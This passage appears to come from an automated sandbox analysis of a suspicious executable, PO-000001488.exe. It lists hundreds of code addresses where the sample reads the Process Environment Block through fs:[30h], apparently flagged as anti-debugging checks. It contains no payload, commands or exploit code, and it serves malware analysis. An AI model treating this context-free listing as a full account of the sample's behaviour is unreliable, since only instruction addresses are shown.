            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01550283 mov eax, dword ptr fs:[00000030h]3_2_01550283
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E02A0 mov eax, dword ptr fs:[00000030h]3_2_014E02A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E02A0 mov eax, dword ptr fs:[00000030h]3_2_014E02A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov eax, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov ecx, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov eax, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov eax, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov eax, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov eax, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D8550 mov eax, dword ptr fs:[00000030h]3_2_014D8550
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D8550 mov eax, dword ptr fs:[00000030h]3_2_014D8550
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150656A mov eax, dword ptr fs:[00000030h]3_2_0150656A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150656A mov eax, dword ptr fs:[00000030h]3_2_0150656A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150656A mov eax, dword ptr fs:[00000030h]3_2_0150656A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01566500 mov eax, dword ptr fs:[00000030h]3_2_01566500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE53E mov eax, dword ptr fs:[00000030h]3_2_014FE53E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE53E mov eax, dword ptr fs:[00000030h]3_2_014FE53E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE53E mov eax, dword ptr fs:[00000030h]3_2_014FE53E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE53E mov eax, dword ptr fs:[00000030h]3_2_014FE53E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE53E mov eax, dword ptr fs:[00000030h]3_2_014FE53E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A5D0 mov eax, dword ptr fs:[00000030h]3_2_0150A5D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A5D0 mov eax, dword ptr fs:[00000030h]3_2_0150A5D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D65D0 mov eax, dword ptr fs:[00000030h]3_2_014D65D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E5CF mov eax, dword ptr fs:[00000030h]3_2_0150E5CF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E5CF mov eax, dword ptr fs:[00000030h]3_2_0150E5CF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D25E0 mov eax, dword ptr fs:[00000030h]3_2_014D25E0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150C5ED mov eax, dword ptr fs:[00000030h]3_2_0150C5ED
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150C5ED mov eax, dword ptr fs:[00000030h]3_2_0150C5ED
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E59C mov eax, dword ptr fs:[00000030h]3_2_0150E59C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D2582 mov eax, dword ptr fs:[00000030h]3_2_014D2582
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D2582 mov ecx, dword ptr fs:[00000030h]3_2_014D2582
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01504588 mov eax, dword ptr fs:[00000030h]3_2_01504588
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015505A7 mov eax, dword ptr fs:[00000030h]3_2_015505A7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015505A7 mov eax, dword ptr fs:[00000030h]3_2_015505A7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015505A7 mov eax, dword ptr fs:[00000030h]3_2_015505A7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F45B1 mov eax, dword ptr fs:[00000030h]3_2_014F45B1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F45B1 mov eax, dword ptr fs:[00000030h]3_2_014F45B1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158A456 mov eax, dword ptr fs:[00000030h]3_2_0158A456
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C645D mov eax, dword ptr fs:[00000030h]3_2_014C645D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E443 mov eax, dword ptr fs:[00000030h]3_2_0150E443
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E443 mov eax, dword ptr fs:[00000030h]3_2_0150E443
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E443 mov eax, dword ptr fs:[00000030h]3_2_0150E443
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E443 mov eax, dword ptr fs:[00000030h]3_2_0150E443
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E443 mov eax, dword ptr fs:[00000030h]3_2_0150E443
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E443 mov eax, dword ptr fs:[00000030h]3_2_0150E443
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E443 mov eax, dword ptr fs:[00000030h]3_2_0150E443
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E443 mov eax, dword ptr fs:[00000030h]3_2_0150E443
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F245A mov eax, dword ptr fs:[00000030h]3_2_014F245A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155C460 mov ecx, dword ptr fs:[00000030h]3_2_0155C460
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FA470 mov eax, dword ptr fs:[00000030h]3_2_014FA470
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FA470 mov eax, dword ptr fs:[00000030h]3_2_014FA470
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FA470 mov eax, dword ptr fs:[00000030h]3_2_014FA470
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01508402 mov eax, dword ptr fs:[00000030h]3_2_01508402
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01508402 mov eax, dword ptr fs:[00000030h]3_2_01508402
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01508402 mov eax, dword ptr fs:[00000030h]3_2_01508402
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A430 mov eax, dword ptr fs:[00000030h]3_2_0150A430
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CC427 mov eax, dword ptr fs:[00000030h]3_2_014CC427
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CE420 mov eax, dword ptr fs:[00000030h]3_2_014CE420
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CE420 mov eax, dword ptr fs:[00000030h]3_2_014CE420
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CE420 mov eax, dword ptr fs:[00000030h]3_2_014CE420
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01556420 mov eax, dword ptr fs:[00000030h]3_2_01556420
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01556420 mov eax, dword ptr fs:[00000030h]3_2_01556420
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01556420 mov eax, dword ptr fs:[00000030h]3_2_01556420
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01556420 mov eax, dword ptr fs:[00000030h]3_2_01556420
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01556420 mov eax, dword ptr fs:[00000030h]3_2_01556420
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01556420 mov eax, dword ptr fs:[00000030h]3_2_01556420
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01556420 mov eax, dword ptr fs:[00000030h]3_2_01556420
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D04E5 mov ecx, dword ptr fs:[00000030h]3_2_014D04E5
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158A49A mov eax, dword ptr fs:[00000030h]3_2_0158A49A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015044B0 mov ecx, dword ptr fs:[00000030h]3_2_015044B0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155A4B0 mov eax, dword ptr fs:[00000030h]3_2_0155A4B0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D64AB mov eax, dword ptr fs:[00000030h]3_2_014D64AB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01554755 mov eax, dword ptr fs:[00000030h]3_2_01554755
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512750 mov eax, dword ptr fs:[00000030h]3_2_01512750
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512750 mov eax, dword ptr fs:[00000030h]3_2_01512750
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155E75D mov eax, dword ptr fs:[00000030h]3_2_0155E75D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D0750 mov eax, dword ptr fs:[00000030h]3_2_014D0750
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150674D mov esi, dword ptr fs:[00000030h]3_2_0150674D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150674D mov eax, dword ptr fs:[00000030h]3_2_0150674D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150674D mov eax, dword ptr fs:[00000030h]3_2_0150674D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D8770 mov eax, dword ptr fs:[00000030h]3_2_014D8770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0770 mov eax, dword ptr fs:[00000030h]3_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01500710 mov eax, dword ptr fs:[00000030h]3_2_01500710
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150C700 mov eax, dword ptr fs:[00000030h]3_2_0150C700
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D0710 mov eax, dword ptr fs:[00000030h]3_2_014D0710
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154C730 mov eax, dword ptr fs:[00000030h]3_2_0154C730
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150273C mov eax, dword ptr fs:[00000030h]3_2_0150273C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150273C mov ecx, dword ptr fs:[00000030h]3_2_0150273C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150273C mov eax, dword ptr fs:[00000030h]3_2_0150273C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150C720 mov eax, dword ptr fs:[00000030h]3_2_0150C720
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150C720 mov eax, dword ptr fs:[00000030h]3_2_0150C720
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DC7C0 mov eax, dword ptr fs:[00000030h]3_2_014DC7C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015507C3 mov eax, dword ptr fs:[00000030h]3_2_015507C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F27ED mov eax, dword ptr fs:[00000030h]3_2_014F27ED
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F27ED mov eax, dword ptr fs:[00000030h]3_2_014F27ED
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F27ED mov eax, dword ptr fs:[00000030h]3_2_014F27ED
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155E7E1 mov eax, dword ptr fs:[00000030h]3_2_0155E7E1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D47FB mov eax, dword ptr fs:[00000030h]3_2_014D47FB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D47FB mov eax, dword ptr fs:[00000030h]3_2_014D47FB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157678E mov eax, dword ptr fs:[00000030h]3_2_0157678E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D07AF mov eax, dword ptr fs:[00000030h]3_2_014D07AF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015847A0 mov eax, dword ptr fs:[00000030h]3_2_015847A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EC640 mov eax, dword ptr fs:[00000030h]3_2_014EC640
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01502674 mov eax, dword ptr fs:[00000030h]3_2_01502674
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A660 mov eax, dword ptr fs:[00000030h]3_2_0150A660
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A660 mov eax, dword ptr fs:[00000030h]3_2_0150A660
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159866E mov eax, dword ptr fs:[00000030h]3_2_0159866E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159866E mov eax, dword ptr fs:[00000030h]3_2_0159866E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E260B mov eax, dword ptr fs:[00000030h]3_2_014E260B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E260B mov eax, dword ptr fs:[00000030h]3_2_014E260B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E260B mov eax, dword ptr fs:[00000030h]3_2_014E260B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E260B mov eax, dword ptr fs:[00000030h]3_2_014E260B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E260B mov eax, dword ptr fs:[00000030h]3_2_014E260B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E260B mov eax, dword ptr fs:[00000030h]3_2_014E260B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E260B mov eax, dword ptr fs:[00000030h]3_2_014E260B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512619 mov eax, dword ptr fs:[00000030h]3_2_01512619
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E609 mov eax, dword ptr fs:[00000030h]3_2_0154E609
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D262C mov eax, dword ptr fs:[00000030h]3_2_014D262C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE627 mov eax, dword ptr fs:[00000030h]3_2_014EE627
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01506620 mov eax, dword ptr fs:[00000030h]3_2_01506620
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01508620 mov eax, dword ptr fs:[00000030h]3_2_01508620
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0150A6C7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A6C7 mov eax, dword ptr fs:[00000030h]3_2_0150A6C7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015506F1 mov eax, dword ptr fs:[00000030h]3_2_015506F1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015506F1 mov eax, dword ptr fs:[00000030h]3_2_015506F1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E6F2 mov eax, dword ptr fs:[00000030h]3_2_0154E6F2
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E6F2 mov eax, dword ptr fs:[00000030h]3_2_0154E6F2
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E6F2 mov eax, dword ptr fs:[00000030h]3_2_0154E6F2
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E6F2 mov eax, dword ptr fs:[00000030h]3_2_0154E6F2
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D4690 mov eax, dword ptr fs:[00000030h]3_2_014D4690
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D4690 mov eax, dword ptr fs:[00000030h]3_2_014D4690
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015066B0 mov eax, dword ptr fs:[00000030h]3_2_015066B0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150C6A6 mov eax, dword ptr fs:[00000030h]3_2_0150C6A6
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01550946 mov eax, dword ptr fs:[00000030h]3_2_01550946
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155C97C mov eax, dword ptr fs:[00000030h]3_2_0155C97C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F6962 mov eax, dword ptr fs:[00000030h]3_2_014F6962
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F6962 mov eax, dword ptr fs:[00000030h]3_2_014F6962
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F6962 mov eax, dword ptr fs:[00000030h]3_2_014F6962
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01574978 mov eax, dword ptr fs:[00000030h]3_2_01574978
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01574978 mov eax, dword ptr fs:[00000030h]3_2_01574978
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0151096E mov eax, dword ptr fs:[00000030h]3_2_0151096E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0151096E mov edx, dword ptr fs:[00000030h]3_2_0151096E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0151096E mov eax, dword ptr fs:[00000030h]3_2_0151096E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155C912 mov eax, dword ptr fs:[00000030h]3_2_0155C912
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C8918 mov eax, dword ptr fs:[00000030h]3_2_014C8918
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C8918 mov eax, dword ptr fs:[00000030h]3_2_014C8918
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E908 mov eax, dword ptr fs:[00000030h]3_2_0154E908
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E908 mov eax, dword ptr fs:[00000030h]3_2_0154E908
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0156892B mov eax, dword ptr fs:[00000030h]3_2_0156892B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155892A mov eax, dword ptr fs:[00000030h]3_2_0155892A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015049D0 mov eax, dword ptr fs:[00000030h]3_2_015049D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159A9D3 mov eax, dword ptr fs:[00000030h]3_2_0159A9D3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015669C0 mov eax, dword ptr fs:[00000030h]3_2_015669C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA9D0 mov eax, dword ptr fs:[00000030h]3_2_014DA9D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA9D0 mov eax, dword ptr fs:[00000030h]3_2_014DA9D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA9D0 mov eax, dword ptr fs:[00000030h]3_2_014DA9D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA9D0 mov eax, dword ptr fs:[00000030h]3_2_014DA9D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA9D0 mov eax, dword ptr fs:[00000030h]3_2_014DA9D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA9D0 mov eax, dword ptr fs:[00000030h]3_2_014DA9D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015029F9 mov eax, dword ptr fs:[00000030h]3_2_015029F9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015029F9 mov eax, dword ptr fs:[00000030h]3_2_015029F9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155E9E0 mov eax, dword ptr fs:[00000030h]3_2_0155E9E0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D09AD mov eax, dword ptr fs:[00000030h]3_2_014D09AD
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D09AD mov eax, dword ptr fs:[00000030h]3_2_014D09AD
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015589B3 mov esi, dword ptr fs:[00000030h]3_2_015589B3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015589B3 mov eax, dword ptr fs:[00000030h]3_2_015589B3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015589B3 mov eax, dword ptr fs:[00000030h]3_2_015589B3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A0 mov eax, dword ptr fs:[00000030h]3_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01500854 mov eax, dword ptr fs:[00000030h]3_2_01500854
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E2840 mov ecx, dword ptr fs:[00000030h]3_2_014E2840
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D4859 mov eax, dword ptr fs:[00000030h]3_2_014D4859
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D4859 mov eax, dword ptr fs:[00000030h]3_2_014D4859
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01566870 mov eax, dword ptr fs:[00000030h]3_2_01566870
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01566870 mov eax, dword ptr fs:[00000030h]3_2_01566870
